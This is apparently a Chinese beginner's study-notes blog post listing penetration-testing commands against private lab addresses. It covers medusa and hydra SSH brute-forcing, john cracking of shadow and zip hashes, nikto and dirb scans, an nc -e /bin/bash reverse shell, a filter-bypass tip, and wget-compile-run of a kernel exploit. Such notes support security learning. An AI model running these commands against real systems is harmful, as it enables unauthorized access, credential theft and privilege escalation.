安防初识命令【学习笔记】

1、美杜莎爆破

medusa  -M  ssh   -h  192.168.42.135 -u guest  -P  top1000.txt   -t 8

2、passwd文件与shadow文件

root:x:0:0:root:/root:/usr/bin/zsh
用户名:密码:uid:gid:描述性信息:主目录:默认shell  (nologin为禁止登陆)

root:$y$j9T$qOgIxPawKD/eOVjjZBtAJ1$vHC6fSvBC3KDEINrK1u5Jb4Lgtv4NdMUGgXmUTl0l/A:19570:0:99999:7:::
用户名:
密码:
最近一次修改密码的时间(修改时间-1970/1/1的天数):
修改密码的间隔时间(在该时间段内不允许修改密码):
密码有效期:
密码过期前的警告提醒天数:
密码过期后宽限多少天:
账号失效时间:
保留字段

$1$     MD5
$y$    yescrypt
$5$    SHA256
$6$    SHA512

3、john解密

john  /etc/shadow  --format=crypt

zip压缩包密码解密
zip2john  test.zip > test_pass.txt

john test_pass.txt

4、web服务器扫描之nikto
nikto--------web安全扫描工具

nikto  -h http://192.168.42.141

dev_shell.php  php+mysql开源框架后台管理界面

/bin目录下存在大部分内核指令,可直接通过/bin/+命令绕过大多数简单的命令字符过滤

5、利用nc进行反弹shell

nc -lvp 6666  服务端开放并监听通信端口

nc -e /bin/bash  192.168.42.134 6666  客户端连接后启动shell

利用python模块让nc反弹shell 美化界面
python -c  “import pty;pty.spawn('/bin/bash')"        pty-----伪终端实用程序

6、gpg文件的解密

gpg --batch --passphrase  密钥 -d  需要解密的文件

gpg最简单的用法
gpg -o 解密后存储的文件 -d 需要解密的文件

7、dirb----web目录文件扫描

dirb  http://192.168.42.142

8、海德拉爆破

hydra  -l potato -P webshell.txt 192.168.42.142 -s 7120 -vV -f ssh

ssh potato@192.168.42.142 -p 7120

uname -a  发现版本较低

9、查找对应内核版本存在的漏洞

searchsploit   ubuntu 3.13.0
指定漏洞所在的路径

searchsploit  -p  37292.c

wget  http://192.168.42.133/37292.c

gcc 37292.c -o exp

chmod 777 exp

./exp

10、信息收集--永恒之眼

nmap  192.168.42.0/24

nmap  -A 192.168.42.142 -p-
 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值